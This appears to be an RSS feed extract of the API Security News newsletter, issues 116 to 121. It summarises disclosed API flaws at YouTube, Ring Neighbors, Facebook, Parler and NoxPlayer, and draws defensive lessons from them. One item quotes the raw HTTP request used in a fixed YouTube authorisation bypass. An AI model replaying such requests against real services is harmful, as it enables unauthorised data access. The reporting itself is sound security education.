<h2>Opinion: API security guidelines</h2>
<p><a href="https://searchapparchitecture.techtarget.com/tip/10-API-security-guidelines-and-best-practices" target="_blank" rel="noopener noreferrer">TechTarget has published the top 10 API security guidelines and best practices</a> from Michael Cobb. Arguably, to me personally, some of these look slightly contestable, but Cobb does a good job in explaining why he put each on the list. Below is the quick list. Check out the original article for more details:</p>
<ol>
<li>Understand the full scope of secure API consumption</li>
<li>Validate the data</li>
<li>Choose your web services API: SOAP vs. REST</li>
<li>Record APIs in an API registry</li>
<li>Assess your API risks</li>
<li>Be diligent about API documentation</li>
<li>Lock down access to APIs</li>
<li>Specify authentication and access</li>
<li>Stash your API keys</li>
<li>Add AI to API monitoring and threat detection</li>
</ol>
<h2>Vote for Us</h2>
<p>If you have not done that yet, please vote for our newsletter in the 2020 DZone Audience Awards by picking <em>Dmitry Sotnikov</em> (me ;)) <a href="https://survey.alchemer.com/s3/6174256/2020-DZone-Audience-Awards" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p>Your vote will help us spread the word and raise awareness of API security.</p>
<p>Huge thanks in advance!</p>
<p>The post <a href="https://apisecurity.io/issue-121-vulnerability-chess-com-graphql-security-playground-checklist/">Issue 121: Vulnerability at chess.com, GraphQL security playground and checklist</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 120: Video doorbells security flaws, intro to JWT attacks, security zines</title>
		<link>https://apisecurity.io/issue-120-video-doorbells-security-flaws-intro-jwt-security/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Feb 2021 22:00:35 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7747</guid>

					<description><![CDATA[<p>This week, we take a look at the security issues in cheap video doorbells and security cameras, as well as tutorials and webinars on protecting APIs running in Kubernetes, JSON web tokens (JWT), and web and API authentication and authorization. Oh, and we also have a link to DZone community awards where you can vote [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-120-video-doorbells-security-flaws-intro-jwt-security/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-120-video-doorbells-security-flaws-intro-jwt-security/">Issue 120: Video doorbells security flaws, intro to JWT attacks, security zines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the security issues in cheap video doorbells and security cameras, as well as tutorials and webinars on protecting APIs running in Kubernetes, JSON web tokens (JWT), and web and API authentication and authorization.</p>
<p>Oh, and we also have a link to DZone community awards where you can vote for this newsletter!</p>
<h2>Vulnerability: Video doorbells and security cameras</h2>
<p>Research teams from <a href="https://www.refirmlabs.com/florida-tech-cybersecurity-researchers-discover-hidden-vulnerabilities-in-wireless-doorbells-cameras/" target="_blank" rel="noopener noreferrer">Florida Tech</a> and <a href="https://research.nccgroup.com/2020/12/18/domestic-iot-nightmares-smart-doorbells/" target="_blank" rel="noopener noreferrer">NCC Group</a> have, independently of each other, looked into the security of inexpensive video doorbells and security cameras. These devices are sold at Walmart, Amazon, Home Depot, Best Buy, to mention but a few.</p>
<p>The researchers concluded that most of the cheap devices on the market come from a handful of Chinese manufacturers (ODMs), using standard generic design and components. This also means that issues found in one model are replicated in others.</p>
<p>The devices they looked at had multiple serious security issues, including built-in backdoors. Some of the found issues were API-related, too:</p>
<ul>
<li>Communications are not encrypted.</li>
<li>Backend APIs are not protected with authentication.</li>
<li>There are REST APIs on cameras with hard-coded credentials.</li>
</ul>
<p>You can find a quick summary of both research efforts in the <a href="https://www.gadgetguy.com.au/cheap-video-doorbells-and-security-cameras-are-highly-insecure/" target="_blank" rel="noopener noreferrer">GadgetGuy</a>. For more details, see the full reports (links above).</p>
<h2>Webinars: API Threat Protection in a Kubernetes World</h2>
<p>In the world of microservice-based applications, every component is an API. As such, API security in the Kubernetes world is a lot more relevant than in the world of traditional applications.</p>
<p>Next Thursday, February 18th at 8 AM PST / 11 AM EST, Isabelle Mauny (42Crunch) gives a webinar on this exact topic.</p>
<p>For more details and to register, click <a href="https://us02web.zoom.us/webinar/register/WN_dgvRHpyqQ4-NLxUQfJKLkg" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p><a href="https://us02web.zoom.us/webinar/register/WN_dgvRHpyqQ4-NLxUQfJKLkg" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="size-full wp-image-7749 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/Kubernetes-microservices-API-security-webinar.jpg" alt="" width="1200" height="675" /></a></p>
<h2>Videos: Attacking JWT for beginners</h2>
<p>If you find the world of JSON Web Token (JWT) security hard, check out this quick introductory video by Farah Hawaa:</p>
<p><iframe loading="lazy" title="ATTACKING JWT FOR BEGINNERS!" width="640" height="360" src="https://www.youtube.com/embed/ghfmx4pr1Qg?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Technology 101: Security Zines</h2>
<p><a href="https://securityzines.com/" target="_blank" rel="noopener noreferrer">Security zines by Rohit Sehgal</a> are fun, easy-to-grasp, comics-style explanations of web and API security.</p>
<p>The first one he has published explains some common authentication and authorization concepts:</p>
<ul>
<li>Basic</li>
<li>Session-based</li>
<li>Token-based</li>
<li>JWT</li>
<li>OAuth</li>
</ul>
<p>For example, here he is covering the OAuth Authorization Code grant:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7750 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/OAuth-authorization-code-grant-zine.jpg" alt="" width="1289" height="1823" /></p>
<h2>Vote for us!</h2>
<p>DZone has nominated this newsletter (which they also republished) for their 2020 Contributor Awards.</p>
<p>If you have a minute and want to support us, <a href="https://survey.alchemer.com/s3/6174256/2020-DZone-Audience-Awards" target="_blank" rel="noopener noreferrer"><strong>please cast your vote here</strong></a>. This will help us further spread the word of API security.</p>
<p><a href="https://survey.alchemer.com/s3/6174256/2020-DZone-Audience-Awards" target="_blank" rel="noopener noreferrer"><img loading="lazy" decoding="async" class="alignleft size-full wp-image-7748" src="https://apisecurity.io/wp-content/uploads/2021/02/14388732-dzone-awards-dmitry.png" alt="" width="972" height="547" /></a></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-120-video-doorbells-security-flaws-intro-jwt-security/">Issue 120: Video doorbells security flaws, intro to JWT attacks, security zines</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 119: NoxPlayer supply-chain attack through a hacked API</title>
		<link>https://apisecurity.io/issue-119-noxplayer-supply-chain-attack-hacked-api/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 03 Feb 2021 22:00:50 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7726</guid>

					<description><![CDATA[<p>This week, we take a look at the recently discovered API attack in NoxPlayer, the latest annual &#8220;State of Web Application Security&#8221; report by Radware, a detailed step-by-step pentesting tutorial, and a recording of a session on API security and Azure API management from AppSec Israel. Vulnerability: NoxPlayer [UPDATE] We have been contacted by a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-119-noxplayer-supply-chain-attack-hacked-api/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-119-noxplayer-supply-chain-attack-hacked-api/">Issue 119: NoxPlayer supply-chain attack through a hacked API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the recently discovered API attack in NoxPlayer, the latest annual &#8220;State of Web Application Security&#8221; report by Radware, a detailed step-by-step pentesting tutorial, and a recording of a session on API security and Azure API management from AppSec Israel.</p>
<h2>Vulnerability: NoxPlayer</h2>
<p><em>[UPDATE] We have been contacted by a BigNox representative assuring us that the security issues have been fixed. They also advised that <a href="https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/" target="_blank" rel="noopener noreferrer">the original ESET research article</a> has been modified to include their statement on the measures taken.</em></p>
<p>NoxPlayer is an Android emulator for PCs and Macs. BigNox, the company behind the emulator, claims that they have over 150 million users predominantly in Asian countries.</p>
<p>The product has an automatic update system where the client invokes a cloud API to check for updates, download, and install them. Security researchers from ESET discovered that this <a href="https://www.welivesecurity.com/2021/02/01/operation-nightscout-supply-chain-attack-online-gaming-asia/" target="_blank" rel="noopener noreferrer">API got hacked to deliver malware instead of normal updates</a>.</p>
<p>The researchers discovered that attackers made the API to selectively deliver to targeted users malware URLs instead of those of regular updates:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7727 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/NoxPlayer-Intrusion-flow-sequence-diagram.png" alt="" width="817" height="453" /></p>
<p>This was a relatively sophisticated attack, and it showed why data validation needs to happen not only on API requests but also on responses. Defining strict patterns for returned data (in this particular case, a regular expression for acceptable update URLs) could have prevented the attack.</p>
<h2>Industry statistics: State of Web Application Security Report</h2>
<p>Radware has released their <a href="https://www.radware.com/newsevents/pressreleases/2021/api-abuse-threat-bot-traffic" target="_blank" rel="noopener noreferrer">&#8220;2020-2021 State of Web Application Security Report&#8221;</a>. Their main conclusion is that API abuse has become the leading threat in the field.</p>
<p>Here are a few of the report highlights:</p>
<ul>
<li>Nearly 40% of organizations surveyed reported that more than one-half of their applications are exposed to the internet or third-party services through APIs.</li>
<li>55% of organizations experience a DoS attack against their APIs at least monthly.</li>
<li>49% experience some form of injection attack at least monthly.</li>
<li>42% experience an element or attribute manipulation at least monthly.</li>
</ul>
<p>Unfortunately, Radware also found that application security specialists have limited  influence on application design and lifecycle:</p>
<ul>
<li>In approximately 90% of organizations, security staff is not the prime influencer on application development architecture or the budget.</li>
<li>Some 43% of companies said security should not interrupt the end-to-end automation of the release cycle.</li>
</ul>
<h2>Tutorials: Pentesting step-by-step</h2>
<p>If you want to learn more about penetration testing exercises, <a href="https://pentestmag.com/insecure-deserialization-with-json-net/" target="_blank" rel="noopener noreferrer">here&#8217;s a nice step-by-step report by Nairuz Abulhul.</a></p>
<p>He took over a Hack The Box machine using vulnerable APIs:</p>
<ol>
<li>An API failure leaked the admin username in the exception text.</li>
<li>Another exception leaked the serializer information.</li>
<li>Finally, lack of input validation allowed him to perform an injection and take over the box.</li>
</ol>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7728 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/02/1_MMo_EYF5Q5dTODpNRpeI_Q.png" alt="" width="1000" height="268" /></p>
<p>Obviously, this is also a good reminder to all API providers why excessive data exposure is a big deal, and data validation is critical.</p>
<h2>Videos: Building better security for your API platform using Azure API Management</h2>
<p>If you have APIs running in Microsoft Azure, this conference talk recording should be valuable to you.</p>
<p>In his talk from AppSec Israel, Eldert Grootenboer goes through security best practices when using Azure API Management:</p>
<blockquote><p><em>&#8220;This session will show how we can use Azure API Management to leverage better security for your APIs. Expect everything around hardening security of your services, with demo&#8217;s, best practices, and tips and tricks from the field.&#8221;</em></p></blockquote>
<p><iframe loading="lazy" title="Building better security for your API platform using Azure API Management by Eldert Grootenboer" width="640" height="360" src="https://www.youtube.com/embed/9xif3-uX-I4?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-119-noxplayer-supply-chain-attack-hacked-api/">Issue 119: NoxPlayer supply-chain attack through a hacked API</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 118: Spring Framework ALPS, OAuth 2.0 attack mindmap, securing JWTs</title>
		<link>https://apisecurity.io/issue-118-spring-framework-alps-oauth-2-0-attack-mindmap-securing-jwts/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 27 Jan 2021 22:00:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7701</guid>

					<description><![CDATA[<p>This week, we check out a potential exposure of APIs developed with Spring Framework and OAuth 2.0 attack classification. There&#8217;s also a recording of a recent JSON web token (JWT) security webinar and an upcoming API security fireside chat at the Postman Galaxy event next week. Vulnerability: Spring Framework Application-Level Profile Semantics Frameworks make developer [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-118-spring-framework-alps-oauth-2-0-attack-mindmap-securing-jwts/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-118-spring-framework-alps-oauth-2-0-attack-mindmap-securing-jwts/">Issue 118: Spring Framework ALPS, OAuth 2.0 attack mindmap, securing JWTs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out a potential exposure of APIs developed with Spring Framework and OAuth 2.0 attack classification. There&#8217;s also a recording of a recent JSON web token (JWT) security webinar and an upcoming API security fireside chat at the Postman Galaxy event next week.</p>
<h2>Vulnerability: Spring Framework Application-Level Profile Semantics</h2>
<p>Frameworks make developer life easier but may also increase your attack surface, as the recent research on Spring Framework demonstrates.</p>
<p>Spring Framework has Application-Level Profile Semantics (ALPS) interface that documents APIs. Joel A. Noguera discovered that <a href="https://niemand.com.ar/2021/01/08/exploiting-application-level-profile-semantics-apls-from-spring-data-rest/" target="_blank" rel="noopener noreferrer">ALPS API might potentially be left public and become a security risk</a>.</p>
<p>Attackers could discover the ALPS interface, use it to obtain details from the API, and access and modify the underlying profiles and data. Unauthenticated users have full access to ALPS API endpoints.</p>
<p>Be mindful when seeking the balance between user-friendliness and security: as the other side of the coin, &#8220;easier&#8221; sometimes means &#8220;less secure.&#8221;</p>
<h2>Resources: OAuth 2.0 attack mindmap</h2>
<p>OAuth 2.0 and its security best practices remain a frequent topic in this newsletter, and for good reasons.</p>
<p>OAuth and OpenID Connect (OIDC), which is based on OAuth, remain the key protocols for authentication and delegated access. Yet, it is very easy to get the implementation wrong and leave your APIs potentially exposed.</p>
<p>Hack3rScr0lls has put together <a href="https://twitter.com/hackerscrolls/status/1269266750467649538" target="_blank" rel="noopener noreferrer">a mindmap of the common attacks on OAuth 2.0</a>. Nice way to organize and visualize the scenarios.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7703 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/OAuth-2.0-attack-mindmap.jpg" alt="" width="1816" height="933" /></p>
<h2>Video: How to Best Leverage JWTs for API Security</h2>
<p>Recently, Isabelle Mauny and I hosted a webinar on JWT security. 42Crunch has <a href="https://42crunch.com/webinar-json-web-tokens-api-security/" target="_blank" rel="noopener noreferrer">published the recording, slides, and Q&amp;A transcript from the session</a>.</p>
<p>We covered the following topics:</p>
<ul>
<li>How JWT works (very briefly ;))</li>
<li>Common attacks</li>
<li>The 42Crunch approach to securing APIs against these attacks.</li>
</ul>
<p><iframe loading="lazy" title="How to Best Leverage JWTs for API Security" width="640" height="480" src="https://www.youtube.com/embed/Eq-LiFJbvXo?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<h2>Conferences: Postman Galaxy</h2>
<p>Next week is the <a href="https://www.postman.com/postman-galaxy/schedule/?hss_channel=tw-817033483730255872" target="_blank" rel="noopener noreferrer">Postman&#8217;s annual Galaxy event</a>. Obviously, it is completely virtual this year, so easy to attend to from the comfort of your own home.</p>
<p>If you are taking part, make sure to attend the fireside chat &#8220;API Security for Enterprises.&#8221; Here&#8217;s the abstract from the conference site:</p>
<blockquote><p><em>&#8220;How is API security and threat protection different for large-scale enterprises? This intimate discussion tackles challenges and offers solutions for mitigating risk and reducing your attack surface in modern architectures. Well-known breaches such as Parler or Starbucks are used to illustrate some of the key challenges faced by enterprises when protecting APIs.&#8221;</em></p></blockquote>
<p>The speakers in the chat are:</p>
<ul>
<li>Jeanine Jue, Head of Global Developer Relations at R3</li>
<li>Bernard Harguindeguy, CTO at Ping Identity</li>
<li>Isabelle Mauny, Co-founder and Field CTO of 42Crunch</li>
</ul>
<p>Register <a href="https://www.postman.com/postman-galaxy/schedule/?hss_channel=tw-817033483730255872" target="_blank" rel="noopener noreferrer">here</a>.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7702 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/postman_galaxy_api_security_fireside_chat.jpg" alt="" width="800" height="400" /></p>
<p>The post <a href="https://apisecurity.io/issue-118-spring-framework-alps-oauth-2-0-attack-mindmap-securing-jwts/">Issue 118: Spring Framework ALPS, OAuth 2.0 attack mindmap, securing JWTs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 117: Vulnerabilities in YouTube and Ring Neighbors app, OAuth Mix-Up attacks, Tamper Dev</title>
		<link>https://apisecurity.io/issue-117-vulnerabilities-youtube-ring-neighbors-app-oauth-mix-attacks-tamper-dev/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 20 Jan 2021 22:00:15 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7665</guid>

					<description><![CDATA[<p>This week, we look into some recent API vulnerability reports on YouTube and Amazon&#8217;s Ring Neighbors app, there is a new proposed addition to the OAuth standard, and Google has developed an API proxy extension for Chrome. Vulnerability: YouTube David Schütz found a clever way to get (limited) access to private YouTube videos via a [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-117-vulnerabilities-youtube-ring-neighbors-app-oauth-mix-attacks-tamper-dev/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-117-vulnerabilities-youtube-ring-neighbors-app-oauth-mix-attacks-tamper-dev/">Issue 117: Vulnerabilities in YouTube and Ring Neighbors app, OAuth Mix-Up attacks, Tamper Dev</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into some recent API vulnerability reports on YouTube and Amazon&#8217;s Ring Neighbors app, there is a new proposed addition to the OAuth standard, and Google has developed an API proxy extension for Chrome.</p>
<h2>Vulnerability: YouTube</h2>
<p>David Schütz found a clever way to <a href="https://bugs.xdavidhu.me/google/2021/01/11/stealing-your-private-videos-one-frame-at-a-time/" target="_blank" rel="noopener noreferrer">get (limited) access to private YouTube videos via a vulnerable API</a>.</p>
<p>Schütz noticed that Google Ads allows users to generate a video thumbnail for a given point in time:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7666 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/ads-moments.gif" alt="" width="600" height="436" /></p>
<p>Schütz looked at the underlying API call and found that the payload had two parameters:</p>
<ol>
<li>The ID of the video</li>
<li>The timestamp where to extract the frame</li>
</ol>
<pre class="line-numbers" data-line="9"><code class="language-http">POST /aw_video/_/rpc/VideoMomentService/GetThumbnails HTTP/1.1
Host: ads.google.com
User-Agent: Internet-Explorer-6
Cookie: [redacted]

__ar={"1":"kCTeqs1F4ME","2":"12240","3":"387719230"}</code></pre>
<p>It turned out that this API call made the API return a Base64-encoded image of the frame in question. The API didn&#8217;t perform any authorization checks, so attackers could supply an ID of someone else&#8217;s private video and get the frame from that video.</p>
<p>This would have allowed them to steal the video content one frame at a time using a script to iterate multiple calls. Here&#8217;s a video demonstrating the proof-of-concept attack:</p>
<p><iframe loading="lazy" title="poc 2019 12 11" width="640" height="360" src="https://www.youtube.com/embed/G3bNbYRTxZM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>No sound was retrieved, and obviously, the attacker would have needed to know the ID of the private video beforehand, so there were some limitations as to how readily this could have been exploited. Nevertheless, this still is a <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization vulnerability (BOLA/IDOR)</a>, and Google did award Schütz $5,000 for the report. The vulnerability has since been fixed.</p>
<p>Lessons learned in this one:</p>
<ul>
<li>APIs shared between different services can be vulnerable to attacks because the teams working on each service may be using different security and data models and may overly trust the caller.</li>
<li>Authorization is critical to API security. Any time you have an API call with a resource identifier as a parameter, implement access rights checks!</li>
</ul>
<h2>Vulnerability: Amazon Ring Neighbors</h2>
<p>Amazon&#8217;s Ring camera has a companion app called Neighbors. The app allows users to anonymously share footage that they deem suspicious.</p>
<p>While the data was supposed to be anonymous, in reality, <a href="https://techcrunch.com/2021/01/14/ring-neighbors-exposed-locations-addresses/" target="_blank" rel="noopener noreferrer">the API has turned out to be extremely leaky</a>. As shown in the picture below, it provides the exact geographic coordinates and the address of the sharer:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7667 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/ring-data-exposed.jpg" alt="" width="1284" height="669" /></p>
<p>Even worse, the posts had sequential IDs that could be enumerated. Thus, attackers could retrieve the addresses of many camera owners.</p>
<p>Lessons learned:</p>
<ul>
<li>This is a classical <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure" target="_blank" rel="noopener noreferrer">OWASP API:3 Excessive data exposure vulnerability</a>.</li>
<li>Treat your APIs as your user interface. Data that users are not supposed to see should not be returned by your APIs either.</li>
<li>Avoid sequential IDs — generate random ones instead.</li>
</ul>
<p>We have previously covered vulnerabilities in the Neighbors app in our issue <a href="https://apisecurity.io/issue-62-vulnerabilities-in-amazon-ring-neighbors-and-droom-websocket-api-security/" target="_blank" rel="noopener noreferrer">62</a> and vulnerabilities in Amazon Ring itself in issues <a href="https://apisecurity.io/issue-57-vulnerabilities-at-facebook-amazon-ring-and-github-owasp-api-security-top-10-webinar/" target="_blank" rel="noopener noreferrer">57</a> and <a href="https://apisecurity.io/issue-21-amazon-ring-doorbell-camera-hacked-open-apis-coming-healthcare/" target="_blank" rel="noopener noreferrer">21</a>.</p>
<h2>Standards: OAuth 2.0 Authorization Server Issuer Identifier in Authorization Response</h2>
<p>We discussed OAuth 2.0 Mix-Up attacks in <a href="https://apisecurity.io/issue-83-indias-covid-19-tracing-app-oauth2-api-attacks/" target="_blank" rel="noopener noreferrer">issue 83</a>. In a mix-up attack on OAuth authentication, an attacker convinces the OAuth client to send credentials (authorization code or access token) that the client obtained from an “honest” authorization server to the attacker’s server:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-6867 alignnone" src="https://apisecurity.io/wp-content/uploads/2020/05/OAuth2-mix-up-attack.png" alt="" width="763" height="551" /></p>
<p>Now, the IETF OAuth Working Group has formally published a <a href="https://www.ietf.org/archive/id/draft-ietf-oauth-iss-auth-resp-00.html" target="_blank" rel="noopener noreferrer">standard proposal by Karsten Meyer zu Selhausen and Daniel Fett on using the <code>iss</code> parameter for OAuth Authorization Responses</a> to prevent such attacks.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7697 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/Blocking-OAuth-Mix-Up-attack-with-iss.jpg" alt="" width="800" height="527" /></p>
<p>This is a draft (expiring July 10, 2021), and the working group welcomes feedback on it.</p>
<h2>Tools: Tamper Dev</h2>
<p>Proxy tools, like Burp and Zap, have long been popular among penetration testers. They allow intercepting calls between a web application and the underlying APIs and then replaying these calls while tweaking the parameters to find possible vulnerabilities.</p>
<p>A team at Google has gone a step further and released a Chrome extension that does just that. <a href="https://tamper.dev/" target="_blank" rel="noopener noreferrer">Tamper Dev</a> allows you to intercept and edit <code>HTTP</code>/<code>HTTPS</code> requests and responses as they happen, right within your browser, without the need for an external proxy.</p>
<p><iframe loading="lazy" title="Tamper Dev" width="640" height="360" src="https://www.youtube.com/embed/drY7U2jEQOM?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>The post <a href="https://apisecurity.io/issue-117-vulnerabilities-youtube-ring-neighbors-app-oauth-mix-attacks-tamper-dev/">Issue 117: Vulnerabilities in YouTube and Ring Neighbors app, OAuth Mix-Up attacks, Tamper Dev</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 116: Facebook and Parler API vulnerabilities, clairvoyance</title>
		<link>https://apisecurity.io/issue-116-facebook-parler-api-vulnerabilities-clairvoyance/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 13 Jan 2021 22:00:54 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=7628</guid>

					<description><![CDATA[<p>This week, we check out the recent API vulnerabilities at Facebook and Parler, there is a new GraphQL discovery tool called clairvoyance, and we have API security advice from Corey Ball. Vulnerability: Facebook Pouya Darabi found an API vulnerability in Facebook that allowed him to create posts on other users&#8217; pages. The posts were not [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-116-facebook-parler-api-vulnerabilities-clairvoyance/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-116-facebook-parler-api-vulnerabilities-clairvoyance/">Issue 116: Facebook and Parler API vulnerabilities, clairvoyance</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we check out the recent API vulnerabilities at Facebook and Parler, there is a new GraphQL discovery tool called clairvoyance, and we have API security advice from Corey Ball.</p>
<h2>Vulnerability: Facebook</h2>
<p>Pouya Darabi found an API vulnerability in Facebook that <a href="https://www.darabi.me/2020/12/create-invisible-post-on-any-facebook.html" target="_blank" rel="noopener noreferrer">allowed him to create posts on other users&#8217; pages</a>. The posts were not popping up in the newsfeed, but they were visible and looked legitimate to anyone who would have accessed them through a direct link.</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7629 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/post_on_pages.jpg" alt="" width="1058" height="551" /></p>
<p>The vulnerability was caused by the lack of authorization checks for &#8220;invisible&#8221; (unlisted) posts. Darabi created such a post using his own account and was able to intercept the API request that Facebook sent. He then substituted the value of the parameter <code>page_id</code> with a value that belonged to a different user account:</p>
<p><img loading="lazy" decoding="async" class="size-full wp-image-7630 alignnone" src="https://apisecurity.io/wp-content/uploads/2021/01/request.png" alt="" width="1304" height="715" /></p>
<p>Darabi then made the API call to share the post that generated a preview page for it. In that call, he also substituted the <code>page_id</code> value. That allowed him to create a post on behalf of another page.</p>
<p>The business impact here could have been quite nasty. Page administrators would not even see such posts because they were unlisted, so they could not review and delete them. Meanwhile, an attacker could distribute a direct link to the post and spread misinformation in the name of the victim.</p>
<p>This is another example of the <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">Broken Object-Level Authorization (BOLA/IDOR) API vulnerability</a>. The API call contains identifiers of a resource among the parameters, yet there is no authorization check to ensure that the caller has the right to access that resource.</p>
<p>Darabi received a total of $30,000 for his finding ($15,000 for the original report and then $15,000 more for a bypass to Facebook&#8217;s initial fix.)</p>
<h2>Vulnerability: Parler</h2>
<p>The recent political drama in the US has affected the tech companies as well and led to an API breach. 70 TB of data from Parler, the Twitter-like social network that was popular among Trump supporters, got scraped through insecure APIs.</p>
<p><strong>UPDATE</strong>: <a href="https://www.wired.com/story/parler-hack-data-public-posts-images-video/" target="_blank" rel="noopener noreferrer">Wired posted a lot more details on what happened</a>, so we have updated the text below based on their coverage:</p>
<ul>
<li>Parler allowed API access to all posts.</li>
<li>API access to public posts didn&#8217;t require any authentication whatsoever.</li>
<li>The IDs of Parler posts were sequential, so it was easy for the attackers to enumerate them all.</li>
<li>There was no rate limiting, making it easy to make lots of calls at a high rate and extract all the data.</li>
<li>The picture and video files were accessible in raw format, which included all metadata, like location information.</li>
<li>Deleted posts were still accessible: when a user deleted a post, Parler did not actually remove the content, just marked it &#8220;deleted&#8221; and stopped showing it in the user interface.</li>
</ul>
<p>These are serious security flaws, so here are a few lessons that one could take heed of, regardless of your political views:</p>
<ul>
<li>Authentication is key to security (see <a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication" target="_blank" rel="noopener noreferrer">OWASP API:2 Broken Authentication</a>)</li>
<li>Using sequential identifiers is an open invitation to get your records enumerated and scraped. Use random IDs instead.</li>
<li>Implement rate-limiting to prevent bulk downloads by attackers.</li>
<li>Do not store any data that you do not need or should not be storing. The less data you keep, the smaller the risk.</li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring" target="_blank" rel="noopener noreferrer">Monitoring, logging</a>, and incident handling processes can help take quick mitigation steps should a breach occur.</li>
</ul>
<h2>Tools: clairvoyance</h2>
<p>Nikita Stupin has developed an open-source tool called <a href="https://github.com/nikitastupin/clairvoyance" target="_blank" rel="noopener noreferrer">clairvoyance</a> that effectively does brute-force discovery of GraphQL APIs. This can be helpful for reconnaissance of GraphQL APIs that have retrospection disabled.</p>
